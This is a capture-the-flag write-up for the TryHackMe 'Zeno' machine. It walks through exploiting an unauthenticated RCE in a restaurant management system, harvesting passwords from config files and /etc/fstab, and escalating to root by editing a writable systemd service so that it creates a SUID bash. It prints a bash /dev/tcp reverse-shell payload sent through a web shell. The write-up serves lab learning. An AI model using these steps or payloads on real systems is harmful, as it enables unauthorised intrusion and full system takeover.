“The only true wisdom is in knowing you know nothing.” - Socrates

Updated on 23 October 2021

Zeno – Medium

In this writeup we’ll cover a great machine, Zeno,  by biniru on TryHackMe.
Room Url: https://tryhackme.com/room/zeno

Summary

  • Nmap and rustscan found the following ports to be open:
    • 22/ssh
    • 12340/http
  • GoBuster with dirb’s big.txt list found a directory rms on port 12340
  • Pathfinder Hotel Restaurant Management System running on port 12340
  • RMS allows RCE (unauthenticated) : searchsploit restaurant management system
  • Exploited using https://www.exploit-db.com/exploits/47520
  • Found multiple passwords throught the file system (config.php and /etc/fstab)
  • We were able to ssh as the user edward by using the passwords found in /etc/fstab.
  • Following was observed for privilege escalation from edward
    • /etc/systemd/system/zeno-monitoring.service is writeable by edward
    • edward can run sudo /usr/sbin/reboot without password
  • Escalation of privileges to root by editing the zeno-monitoring service file and rebooting the system
  • All Done! 😀

Enumeration

  • Nmap and rustscan found that the following ports are open:
    • 22/ssh
    • 12340/http
  • Browsing to port 12340, we came across a ‘404 Not found’
  • Running GoBuster with dirb’s big.txt list, we found that there is a directory ‘rms’
  • Browsing to the ‘rms’ directory, we found an application for ‘Pathfinder Hotel Restaurant Management System’
  • Tried common credentials, no luck
  • Searched for ‘restaurant management system’ on searchsploit:
    • searchsploit restaurant management system
    • We found that the application is vulnerable to RCE

Exploitation

  • We looked inside the exploit, to ensure that the exploit was for the application running
    • searchsploit -x 47520
  • The exploit had minor formatting issues.
  • Leveraged the exploit to gain RCE on the server.
  • Commands:
    • searchsploit -m 47520
    • Fixed exploit formatting, specifically lines 40, 45 and 70
    • python3 47520.py http://10.10.228.195:12340/rms/
    • The shell could be accessed using the URL specified in the exploit results.
      • http://{ip}:12340/rms/images/reverse-shell.php 
    • We got a reverse shell using the following:
      • nc -nvlp 1234
      • Browsed to http://{ip}:12340/rms/images/reverse-shell.php?cmd=bash+-i+>%26+/dev/tcp/{listnerip}/1234+0>%261

Privilege Escalation - 1

  • We got a shell as the apache user
  • Looking for ways to escalate our privileges, we  ran linpeas and observed the following:
    • root DB creds inside /var/www/html/rms/connection/config.php
    •  apache user has write privileges over /etc/systemd/system/zeno-monitoring.service
    • There are credentials for user zeno inside /etc/fstab
    • There is a user called edward in the system
  • We attempted to use the passwords obtained against the user edward
    • By using the one found in /etc/fstab we were able to SSH as edward
  • Once logged in as edward, we were  able to read the user.txt file.
  • Looking for further escalation in privileges, we found that edward can run sudo /usr/sbin/reboot without password.

Privilege Escalation - 2

  • Combining the write privileges over zeno-monitoring service and reboot privileges, we were able to spawn a root shell.
  • Procedure:
    • Edited the /etc/systemd/system/zeno-monitoring.service file to have the following contents:
				
					[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/root_shell; chmod +xs /home/edward/root_shell'

[Install]
WantedBy=multi-user.target
    • Once edited, we rebooted the system using sudo /usr/sbin/reboot , hoping that our modification worked.
    • Once the system was rebooted, we were able to spawn a root shell using: /home/edward/root_shell -p
    • All Done! 😀

 

Hope you enjoyed reading this writeup.
Happy Hunting!

Posted by: infinity

CONTENTS